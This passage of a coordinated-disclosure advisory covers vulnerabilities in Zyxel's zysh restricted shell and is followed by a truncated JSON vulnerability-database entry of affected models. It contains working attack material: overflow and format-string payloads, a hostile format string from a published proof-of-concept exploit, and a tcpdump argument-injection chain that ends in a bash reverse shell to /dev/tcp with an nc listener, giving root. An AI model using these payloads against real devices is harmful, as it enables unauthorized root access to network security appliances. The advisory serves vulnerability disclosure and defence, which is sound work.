    int do_debug(ulonglong argc, char argv) { ... undefined8 local_e0; ... if (lVar24 == 0x155) { pFVar12 = fopen64("/tmp/webhelppath", "r"); ... __isoc99_fscanf(pFVar12, "%s", &local_e0); / VULN #5 / fclose(pFVar12); fwrite(&DAT_1013fe18, 1, 9, stdout); puVar22 = &local_e0; pcVar11 = "Webhelp redirect: %s\n"; } LAB_1000f7d0: fprintf(stdout, pcVar11, puVar22); fwrite(&DAT_1013fe48, 1, 2, stdout); return 0; }

    The vulnerability lies in the use of the unsafe __isoc99_fscanf() API function, which does not check if the destination string is large enough to accommodate the whole source string. This allows us to overwrite the saved return address and hijack the control flow. Our hostile buffer is limited to a length of 255 bytes and can contain only alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_', dash '-', and dot '.' special characters.

    A similar bug can be triggered with the "debug gui kb redirect" and "debug gui show kb redirect" command combination. However, in this case, the destination buffer is too far away from the location where the return address is saved on the stack, therefore we cannot exploit this bug to control the pc register. We do not exclude other ways to exploit this vulnerability.

    --[ 4.3 - Buffer overflow in the "ssh" command

    The buffer overflow vulnerability we identified in the code responsible for handling the "ssh" command is located in the function at 0x10012298, which we dubbed do_ssh():

    undefined8 do_ssh(int argc, char argv) { ... char acStack336[300]; ... sprintf(acStack336, "/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s", argv[1]); / VULN #5 / ... sVar4 = strlen(acStack336); sprintf(acStack336 + sVar4, " -p %s", (undefined4 )((int)argv + iVar2)); / VULN #6 / ... }

    You know the gist by now: there are two stack-based buffer overflows caused by the unchecked use of the unsafe API function sprintf(). To trigger the first overflow the following payload can be used, as an authenticated admin or limited-admin user:

    Router> ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1's password: [press enter a few times] Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    Once again, our hostile buffer can contain only alphanumeric characters, plus some special characters. As a side note, we noticed that we can inject arguments that get passed to the underlying /usr/bin/ssh command, albeit with some limitations:

    Router> ssh -@127.0.0.1 unknown option -- @ usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-J [user@]host[:port]] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] destination [command]

    Based on our analysis, this lack of input filtering is not exploitable to inject interesting command-line arguments (e.g. "-o ProxyCommand=..."):

    Router> ssh -oProxyCommand@127.0.0.1 command-line: line 0: Bad configuration option: proxycommand@127.0.0.1 Router> ssh -oProxyCommand=@127.0.0.1 % (after 'ssh'): Parse error retval = -1 ERROR: Parse error/command not found!

    --[ 4.4 - Format string bugs in the "extension" argument of some commands

    Some zysh commands implement a special "extension" argument that allows to specify arbitrary command-line arguments to be passed to the invoked OS command that underlies each functionality:

    Router> ping 127.0.0.1 ; count extension forever interface size source |

    For instance, if we enter the following zysh command:

    Router> ping 127.0.0.1 extension -c 1

    The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

    $ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3 -c 1

    As you can see, the additional arguments we specified after the "extension" keyword are appended to the OS command line.

    We identified format string bugs in the following zysh commands:

    • "ping" and "ping6" commands, handled by the function at 0x1000c0a0, which we dubbed do_ping().
    • "traceroute" and "traceroute6" commands, handled by the function at 0x1000bc58, which we dubbed do_traceroute().
    • "nslookup" and "nslookup6" commands, handled by the function at 0x1000c718, which we dubbed do_nslookup().

    The relevant pseudo-code snippets are:

    undefined8 do_ping(int argc, char argv, char cmd) { ... if (iVar9 != 0) { sVar5 = strlen(acStack880); pcVar1 = ppcStack96[iVar9 + 1]; acStack880[sVar5] = ' '; acStack880[sVar5 + 1] = '\0'; strcpy(acStack880 + sVar5 + 1, pcVar1); / append extension args / } if (iVar8 == 0) { sprintf(acStack4976, acStack880); / VULN: format string bug */ __pid = fork(); ... }

    undefined8 do_traceroute(int argc, char argv, char cmd) { ... if (iVar10 != 0) { sVar6 = strlen(acStack864); pcVar2 = argv[iVar10 + 1]; acStack864[sVar6] = ' '; acStack864[sVar6 + 1] = '\0'; strcpy(acStack864 + sVar6 + 1, pcVar2); / append extension args / } ... LAB_1000be10: sprintf(acStack4960,acStack864); / VULN: format string bug */ __pid = fork(); ... }

    undefined8 do_nslookup(int argc, char argv) { ... pcVar4 = stpcpy((char )((int)&uStack832 + sVar3 + 1), (char )((int)argv + iVar2)); if (iVar8 != 0) { pcVar4[1] = '\0'; pcVar4 = ' '; strcpy(pcVar4 + 1, argv[iVar8 + 1]); / append extension args / } ... sprintf(acStack4928, (char )&uStack832); / VULN: format string bug / __pid = fork(); ... }

    As a side note, in the "nslookup" and "nslookup6" commands there is also a bonus stack-based buffer overflow that is not large enough to reach the saved return address. It can be reproduced with the following payload:

    Router> nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGBUS, Bus error. 0x1000ba10 in _ftext () (gdb) x/i $pc => 0x1000ba10 <_ftext+17776>: lw v1,-10184(s0) (gdb) i r s0 s0: 0x4141414141414141

    To reproduce the format string bugs and leak stack memory contents or crash zysh, instead, the following payloads can be used:

    Router> # stack memory leak Router> ping 127.0.0.1 extension %x%x%x%x ping: unknown host 6eb83a7580808080fefeff001145e560 Router> # crash Router> ping 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000c38c in _ftext () << do_ping()

    ... Router> # crash Router> ping6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    Router> # crash Router> traceroute 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000be18 in _ftext () << do_traceroute()

    ... Router> # crash Router> traceroute6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    Router> # stack memory leak Router> nslookup 127.0.0.1 extension %x%x%x%x Using domain server: Name: 127.0.0.1 Address: 127.0.0.1#53 Aliases:

    Host 0bd01390 not found: 3(NXDOMAIN) Router> # crash Router> nslookup 127.0.0.1 extension %n%n%n%n

    Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000c8c0 in _ftext () << do_nslookup()

    ... Router> # crash Router> nslookup6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    We just confirmed that we control the format strings passed as argument to the sprintf() API function in different locations of our target binary.

    --[ 4.5 - OS command injection in the "packet-trace" command

    The OS command injection we identified in the code responsible for handling the "packet-trace" command is located in the function at 0x10010258, which we dubbed do_packet-trace().

    This function builds the command line for the /usr/sbin/tcpdump binary, based on the arguments with which the "packet-trace" command is invoked. The available arguments are:

    Router# packet-trace ; dst-host duration extension-filter file interface ip-proto ipv6-proto port src-host |

    The "extension-filter" argument is particularly interesting, because it allows to specify additional arbitrary command-line arguments to be passed to tcpdump. For instance, if we enter the following zysh command:

    Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id

    The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

    $ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id

    As you can see, we are using a variation of a well-known GTFOBins payload [4] that allows us to execute the following OS command (yes, command-line switches that begin with a '-' are accepted):

    $ id -a

    Refer to the manual page of tcpdump [5] for further details on how each command-line switch is interpreted. Seeing it all in action from the Web Console, as an authenticated admin or limited-admin user:

    Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes Maximum file limit reached: 1 1 packet captured 2 packets received by filter 0 packets dropped by kernel uid=0(root) gid=0(root) groups=0(root)

    We got arbitrary command execution as root! We just need to find a way to exploit it to escape the restricted shell environment.

    --[ 5 - Exploitation

    In the following sections, we will discuss exploitation of the identified vulnerabilities.

    --[ 5.1 - Buffer overflows

    The zysh binary is in a sorry state when it comes to modern countermeasures against exploitation of memory corruption bugs:

    • No RELRO
    • No stack canary
    • NX disabled
    • No PIE
    • Has RWX segments

    That said, it looks like the buffer overflow vulnerabilities described in this advisory cannot be exploited to achieve arbitrary code execution after all, despite our gut feeling... In summary:

    • MIPS alphanumeric shellcode is not a thing [6].
    • A pure ROP chain is also not feasible, at least with the memory mapping used by the device and firmware version combination that we could test.

    We can solve the first problem by storing our shellcode (along with a copious number of NOP-equivalent opcodes) in the value of the TERM environment variable that gets passed to the remote system via sshd (or in.telnetd). At this point, we still need to be able to overwrite the stored return address with a value that points to our NOP sled and shellcode payload, though. Unfortunately, a partial overwrite would not work in this case, because our target architecture is big endian and therefore we would only be able to overwrite the most significant byte(s), achieving nothing of note. On a device and firmware combination with a slightly different memory mapping, however, we might be able to pull this off and hijack the control flow.

    We are not well-versed in the fine and obscure art of MIPS shellcoding and exploitation, so we might have missed something. Feel free to try this challenge on your own!

    As a final note, we also looked into the possibility to exploit the many unsafe calls to system() present in the code in order to inject arbitrary OS commands. However, we could not slip past the pretty aggressive input filters implemented by zysh. Too bad.

    --[ 5.2 - Format string bugs

    As discussed earlier, we control the format strings passed as argument to the sprintf() API function in different locations of our target binary. As a proof of concept, this allowed us to leak stack memory contents and crash zysh.

    It is now time to see if we are able to exploit the identified format string bugs to execute arbitrary code and escape the restricted shell environment... At first glance, this does not look feasible, because once again we are limited in the characters that we can use in our hostile buffer (alphanumeric characters plus some special characters in the 7-bit ASCII set).

    However, we devised a workaround: instead of placing our retloc addresses at the beginning of the hostile format string as is customary, we can inject them in the process memory via the TERM environment variable! The direct parameter access feature of glibc, together with our very own format string exploitation technique for RISC architectures [7], will do the rest.

    Long story short, we put together a proof-of-concept exploit [8] that does the following:

    • Authenticate and access the target zysh via SSH, injecting our payload (retloc sled + NOP sled + shellcode + padding) via the TERM environment variable.

    • Leak a stack address via the format string bug in the "ping" command, and use it to calculate the address of our injected shellcode near the bottom of the stack, which changes slightly at each zysh execution.

    • Craft another hostile format string to use as an argument to the "ping" command and overwrite the .got entry of fork(), which gets called right after the vulnerable sprintf(), with the shellcode address, using a variation of our write-one-byte-at-a-time technique designed for RISC architectures such as MIPS and SPARC.

    • Interact with the spawned bash shell!

    We initially thought that Python/Paramiko would be a good language choice for the implementation, but we quickly changed our mind. In the end, we decided to go full old-school and developed our exploit in Tcl/Expect. Here it is in action:

    raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp admin password raptor_zysh_fhtagn.exp - zysh format string PoC exploit Copyright (c) 2022 Marco Ivaldi raptor@0xdeadbeef.info

    Leaked stack address: 0x7fe97170 Shellcode address: 0x7fe9de40 Base string length: 46 Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn

    *** enjoy your shell! ***

    sh-5.1$ uname -snrmp Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 sh-5.1$ id uid=10007(admin) gid=10000(operator) groups=10000(operator)

    Once we have access to a bash shell on the underlying embedded Linux OS, it should be pretty easy to escalate privileges to root, by leveraging local vulnerabilities [1].

    It should not be too hard to automate/weaponize our exploit to make it work against other targets. This is left as an exercise.

    In conclusion, format string bugs are a powerful exploit primitive, one of our favorites. Once again, they proved to be up to the task even in a constrained scenario such as the one we described.

    --[ 5.3 - OS command injection

    We managed to find a way to execute arbitrary OS commands by injecting specially-crafted arguments into the tcpdump command line. However, exploitation of this vulnerability to escape the restricted shell environment is not straightforward, due to a number of constraints:

    • We can only execute OS commands that do something useful to reach our goal when invoked with exactly one command-line argument.

    • Executing "bash -i" (or similar commands such as gdb and python) directly does not work, because the shell would die with a "Bad file descriptor" error or similar.

    • We could upload a shellcode binary via the FTP service (enabled by default on our test device) in the /etc/zyxel/ftp/tmp directory, but to be able to execute it we would need to find a way to turn the file's executable bit on; we might also be able to abuse some zysh functionality to create an executable file in /etc/zyxel/ftp/tmp that we can later overwrite via FTP or some other means that keep the executable bit on, but we could not find an immediate way to do this.

    • We even crafted plain-text traffic to inject arbitrary commands into the pcap output file saved by tcpdump, and tried executing this file as a bash script, but bash would refuse to run it ("cannot execute binary file").

    • Alternatively, we could directly upload a shell script via FTP and run it as an argument to bash, but before its execution it would get overwritten by tcpdump; in theory, we could try winning a race by continuously uploading the shell script while tcpdump is executing. Luckily, before we had to implement this, we found a better way.

    We were indeed lucky in finding almost by accident the reliable way to exploit this vulnerability that we are going to describe, which involves the use of standard output as a tcpdump output file ("-w -" command-line option) and some eldritch file descriptor trickery.

    In order to escape the restricted shell environment and execute arbitrary commands as root on the underlying embedded Linux OS, first authenticate to the Web Console at https:///webconsole/ as either an admin or limited-admin user. Then, run the following commands:

    Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# Python 2.7.14 (default, Sep 23 2021, 23:30:37) [GCC 4.7.0] on linux2 Type "help", "copyright", "credits" or "license" for more information.

    [press enter a few times] Router# Router# Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# # [press enter again] File "", line 1 ^ SyntaxError: invalid syntax import os os.system("bash -i >& /dev/tcp//23234 0>&1")

    This will get you a privileged reverse shell:

    raptor@gollum:~$ nc -nvlp 23234 Listening on 0.0.0.0 23234 Connection received on 54330 bash: cannot set terminal process group (25792): Inappropriate ioctl for device bash: no job control in this shell bash-5.1# uname -a uname -a Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7010p1.2-800-AAP) GNU/Linux bash-5.1# id id uid=0(root) gid=10000(operator) groups=0(root),10000(operator) bash-5.1#

    Of course, you can choose to execute your favorite Python code instead.

    Apparently, we managed to find a way to connect the standard input of the Web Console to the standard input of the python process we spawned with the first command, in a mind-bending exploit. To preserve our sanity, we have not thoroughly investigated how this is happening... but it works! And it is very reliable.

    On our test device, this exploitation vector only works from the Web Console, as an authenticated admin or limited-admin user. As an added benefit, as we have seen, the Web Console spawns zysh as root.

    We do not exclude other ways to exploit the described vulnerability, perhaps by creating or overwriting critical system files. It could also be easily abused to clobber arbitrary files and cause a Denial of Service condition on vulnerable devices, although we are not going to provide a proof-of-concept exploit for this (we are pretty sure you can easily figure it out on your own anyway).

    --[ 6 - Affected products

    According to Zyxel, zysh is present on a wide range of products, including their security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP controllers and APs.

    Our audit was conducted exclusively on a Zyxel USG20-VPN test device with Firmware 5.10. However, other products and firmware versions have been confirmed by Zyxel to be affected by the same vulnerabilities.

    --[ 7 - Remediation

    During the whole coordinated disclosure process, Zyxel was very responsive. Working with them has been a pleasure and we would like to publicly acknowledge it, as unfortunately this is not always the case with every vendor.

    The memory corruption bugs were collectively assigned CVE-2022-26531, while the OS command injection vulnerability was assigned CVE-2022-26532. Please refer to their advisory for patching information.

    We have not checked the effectiveness of the fixes.

    --[ 8 - Disclosure timeline

    2022-02-25: Zyxel was notified via security@zyxel.com.tw. 2022-02-25: Zyxel acknowledged our vulnerability reports. 2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the reported issues and informed us of their intention to publish their security advisory on 2022-05-24. 2022-03-18: As a token of their appreciation, Zyxel gave us a certificate of recognition. 2022-05-24: Zyxel published their security advisory, following our coordinated disclosure timeline. 2022-06-07: HN Security published this advisory with full details.

    --[ 9 - References

    [0] https://www.zyxel.com/ [1] https://security.humanativaspa.it/tag/zyxel/ [2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1 [3] https://en.wikipedia.org/wiki/MIPS_architecture [4] https://gtfobins.github.io/gtfobins/tcpdump/ [5] https://www.tcpdump.org/manpages/tcpdump.1.html [6] https://twitter.com/pulsoid/status/1368146791473045504 [7] http://phrack.org/issues/70/13.html#article [8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp [9] https://support.zyxel.eu/hc/en-us/articles/360013941859

    Copyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-1789",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg20",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa210ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtd.2\\)"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 20w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wac5302d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(abfh.10\\)"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "wac500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abvs.2\\)"
          },
          {
            "model": "nsg50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 1900",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "nwa50ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abyw.5\\)"
          },
          {
            "model": "usg210",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "nxc2500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(aaig.3\\)"
          },
          {
            "model": "nsg100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "wac6553d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasg.7\\)"
          },
          {
            "model": "usg200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wac6552d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abio.7\\)"
          },
          {
            "model": "nsg300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "usg2200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "nap353",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abey.7\\)"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nap203",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abfa.7\\)"
          },
          {
            "model": "wax650s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abrm.2\\)"
          },
          {
            "model": "nwa55axe",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abzl.5\\)"
          },
          {
            "model": "usg 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nsg50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "nwa90ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.27\\(accv.2\\)"
          },
          {
            "model": "nxc5500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(aaos.3\\)"
          },
          {
            "model": "wac6103d-i",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aaxh.7\\)"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 20w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa5123-ac-hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abim.6\\)"
          },
          {
            "model": "wax510d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtf.2\\)"
          },
          {
            "model": "wac5302d-sv2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abvz.6\\)"
          },
          {
            "model": "usg 1900",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa1302-ac",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abku.6\\)"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg20",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "nsg100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "nap303",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abex.7\\)"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg 60w",
